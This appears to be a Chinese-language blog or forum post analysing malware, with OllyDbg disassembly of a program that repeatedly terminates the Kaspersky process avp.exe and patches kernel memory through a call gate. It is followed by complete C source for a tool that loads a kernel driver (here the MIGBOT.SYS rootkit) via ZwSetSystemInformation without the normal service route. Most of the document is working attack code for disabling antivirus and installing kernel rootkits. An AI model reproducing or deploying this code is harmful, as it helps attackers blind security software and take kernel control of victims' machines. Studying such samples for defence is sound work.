OD代码:
0040130B |. 68 54304000 push 00403054 ; /Arg1 = 00403054 ASCII "avp.exe"
00401310 |. E8 4FFEFFFF call 00401164 ; /结束卡巴.00401164
00401315 |. A3 38304000 mov dword ptr [403038], eax
0040131A |. FF35 38304000 push dword ptr [403038] ; /ProcessId = 0
00401320 |. 6A 00 push 0 ; |Inheritable = FALSE
00401322 |. 6A 01 push 1 ; |Access = TERMINATE
00401324 |. E8 2B010000 call <jmp.&kernel32.OpenProcess> ; /OpenProcess
00401329 |. 8BD8 mov ebx, eax
0040132B |. 6A FF push -1 ; /ExitCode = FFFFFFFF (-1.)
0040132D |. 53 push ebx ; |hProcess
0040132E |. E8 3F010000 call <jmp.&kernel32.TerminateProcess> ; /TerminateProcess
00401333 |. 53 push ebx ; /hObject
00401334 |. E8 FD000000 call <jmp.&kernel32.CloseHandle> ; /CloseHandle
00401339 |. 68 C8000000 push 0C8 ; /Timeout = 200. ms
0040133E |. E8 29010000 call <jmp.&kernel32.Sleep> ; /Sleep
00401343 |. 68 5C304000 push 0040305C ; /Arg1 = 0040305C ASCII "avp.exe"
00401348 |. E8 17FEFFFF call 00401164 ; /结束卡巴.00401164
0040134D |. A3 38304000 mov dword ptr [403038], eax
00401352 |. FF35 38304000 push dword ptr [403038] ; /ProcessId = 0
00401358 |. 6A 00 push 0 ; |Inheritable = FALSE
0040135A |. 6A 01 push 1 ; |Access = TERMINATE
0040135C |. E8 F3000000 call <jmp.&kernel32.OpenProcess> ; /OpenProcess
00401361 |. 8BD8 mov ebx, eax
00401363 |. 6A FF push -1 ; /ExitCode = FFFFFFFF (-1.)
00401365 |. 53 push ebx ; |hProcess
00401366 |. E8 07010000 call <jmp.&kernel32.TerminateProcess> ; /TerminateProcess
0040136B |. 53 push ebx ; /hObject
0040136C |. E8 C5000000 call <jmp.&kernel32.CloseHandle> ; /CloseHandle
00401371 |. 68 C8000000 push 0C8 ; /Timeout = 200. ms
00401376 |. E8 F1000000 call <jmp.&kernel32.Sleep> ; /Sleep
0040137B |. 68 64304000 push 00403064 ; /Arg1 = 00403064 ASCII "avp.exe"
00401380 |. E8 DFFDFFFF call 00401164 ; /结束卡巴.00401164
00401385 |. A3 38304000 mov dword ptr [403038], eax
0040138A |. FF35 38304000 push dword ptr [403038] ; /ProcessId = 0
00401390 |. 6A 00 push 0 ; |Inheritable = FALSE
00401392 |. 6A 01 push 1 ; |Access = TERMINATE
00401394 |. E8 BB000000 call <jmp.&kernel32.OpenProcess> ; /OpenProcess
00401399 |. 8BD8 mov ebx, eax
0040139B |. 6A FF push -1 ; /ExitCode = FFFFFFFF (-1.)
0040139D |. 53 push ebx ; |hProcess
0040139E |. E8 CF000000 call <jmp.&kernel32.TerminateProcess> ; /TerminateProcess
004013A3 |. 53 push ebx ; /hObject
004013A4 |. E8 8D000000 call <jmp.&kernel32.CloseHandle> ; /CloseHandle
004013A9 |. 68 C8000000 push 0C8 ; /Timeout = 200. ms
004013AE |. E8 B9000000 call <jmp.&kernel32.Sleep> ; /Sleep
004013B3 |. 5F pop edi
004013B4 |. 5E pop esi
004013B5 |. 5B pop ebx
004013B6 /. C3 retn
004013B7 >/$ 6A 01 push 1 ; /ShowState = SW_SHOWNORMAL
004013B9 |. 68 6C304000 push 0040306C ; |CmdLine = "Call.dat"
004013BE |. E8 C1000000 call <jmp.&kernel32.WinExec> ; /WinExec
004013C3 |. E8 75FEFFFF call 0040123D
004013C8 |. 0BC0 or eax, eax
004013CA |. 74 62 je short 0040142E
004013CC |. A3 09304000 mov dword ptr [403009], eax
004013D1 |. FF1D 3C304000 call far fword ptr [40303C]
004013D7 |. 8BC4 mov eax, esp
004013D9 |. 8B6424 04 mov esp, dword ptr [esp+4]
004013DD |. 50 push eax
004013DE |. A1 09304000 mov eax, dword ptr [403009]
004013E3 |. C680 B1B70100>mov byte ptr [eax+1B7B1], 0EB
004013EA |. C680 86CA0100>mov byte ptr [eax+1CA86], 0EB
004013F1 |. 5C pop esp
004013F2 |. 68 F8134000 push 004013F8
004013F7 |. CB retf ; RET 用作跳转到 004013F8
004013F8 |> 6A 00 push 0 ; /pModule = NULL
004013FA |. E8 4F000000 call <jmp.&kernel32.GetModuleHandleA> ; /GetModuleHandleA
004013FF |. A3 78304000 mov dword ptr [403078], eax
00401404 |. 68 D0070000 push 7D0 ; /Timeout = 2000. ms
00401409 |. E8 5E000000 call <jmp.&kernel32.Sleep> ; /Sleep
0040140E |. E8 F5FEFFFF call 00401308
00401413 |. E8 F0FEFFFF call 00401308
00401418 |. E8 EBFEFFFF call 00401308
0040141D |. 6A 0A push 0A ; /Arg4 = 0000000A
0040141F |. 6A 00 push 0 ; |Arg3 = 00000000
00401421 |. 6A 00 push 0 ; |Arg2 = 00000000
00401423 |. FF35 78304000 push dword ptr [403078] ; |Arg1 = 00000000
00401429 |. E8 D2FBFFFF call 00401000 ; /结束卡巴.00401000
0040142E |> 6A 00 push 0 ; /ExitCode = 0
00401430 /. E8 0D000000 call <jmp.&kernel32.ExitProcess> ; /ExitProcess
而Call.dat通过ZwSetSystemInformation(这种方法用的不太多吧)加载驱动C:/MIGBOT.SYS
在邪八找到了一段代码,又学到东西了:
#include <windows.h>
#include <stdio.h>
#define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)
#define SystemLoadAndCallImage 38
typedef struct _UNICODE_STRING {
USHORT Length;
USHORT MaximumLength;
PVOID Buffer;
} UNICODE_STRING, *PUNICODE_STRING;
typedef unsigned long NTSTATUS;
typedef struct _SYSTEM_LOAD_AND_CALL_IMAGE
{
UNICODE_STRING ModuleName;
} SYSTEM_LOAD_AND_CALL_IMAGE, *PSYSTEM_LOAD_AND_CALL_IMAGE;
typedef DWORD (CALLBACK* ZWSETSYSTEMINFORMATION)(DWORD, PVOID, ULONG);
ZWSETSYSTEMINFORMATION ZwSetSystemInformation;
typedef DWORD (CALLBACK* RTLINITUNICODESTRING)(PUNICODE_STRING,PCWSTR );
RTLINITUNICODESTRING RtlInitUnicodeString;
typedef DWORD (CALLBACK* RTLANSISTRINGTOUNICODESTRING)(PVOID, PVOID,DWORD);
RTLANSISTRINGTOUNICODESTRING RtlAnsiStringToUnicodeString;
int main(int argc, char *argv[])
{
SYSTEM_LOAD_AND_CALL_IMAGE GregsImage;
UNICODE_STRING TmpBuff;
char szDrvFullPath[256],szTmp[256];
int iBuffLen;
printf("Load driver with ZwSetSystemInformation( )/r/n");
printf("Date: 8th May 2007/r/n");
printf("Modifed by: GaRY <wofeiwo_at_gmail_dot_com>/r/n/r/n");
if(argc != 2 || stricmp(argv[1], "-h") ==0 || stricmp(argv[1], "-?") ==0 || stricmp(argv[1], "/?") ==0)
{
printf("Usage: %s <DriverPath>/r/n", argv[0]);
exit(-1);
}
// 从ntll.dll获取函数
if( !(RtlInitUnicodeString = (RTLINITUNICODESTRING) GetProcAddress( GetModuleHandle("ntdll.dll"), "RtlInitUnicodeString" )) )
{
printf( "GetProcAddress(/"RtlInitUnicodeString/") Error:%d/n", GetLastError() );
exit(1);
}
if( !(ZwSetSystemInformation = (ZWSETSYSTEMINFORMATION) GetProcAddress( GetModuleHandle("ntdll.dll"), "ZwSetSystemInformation" )) )
{
printf( "GetProcAddress(/"ZwSetSystemInformation/") Error:%d/n", GetLastError() );
exit(1);
}
if( !(RtlAnsiStringToUnicodeString = (RTLANSISTRINGTOUNICODESTRING) GetProcAddress( GetModuleHandle("ntdll.dll"), "RtlAnsiStringToUnicodeString" )) )
{
printf( "GetProcAddress(/"ZwSetSystemInformation/") Error:%d/n", GetLastError() );
exit(1);
}
GetFullPathName(argv[1], 256, szTmp, NULL);
printf("Loading driver: %s/r/n", szTmp);
iBuffLen = sprintf(szDrvFullPath, "//??//%s", szTmp);
szDrvFullPath[iBuffLen]=0;
TmpBuff.Buffer = (PVOID)szDrvFullPath;
TmpBuff.Length = iBuffLen;
RtlAnsiStringToUnicodeString(&(GregsImage.ModuleName),&TmpBuff,1);
if( NT_SUCCESS( ZwSetSystemInformation( SystemLoadAndCallImage, &GregsImage, sizeof(SYSTEM_LOAD_AND_CALL_IMAGE)) )) //加载进内核空间
{
printf("Driver: %s loaded./r/n", szDrvFullPath);
}
else
{
printf("Driver: %s not loaded./r/n", szDrvFullPath);
}
return true;
}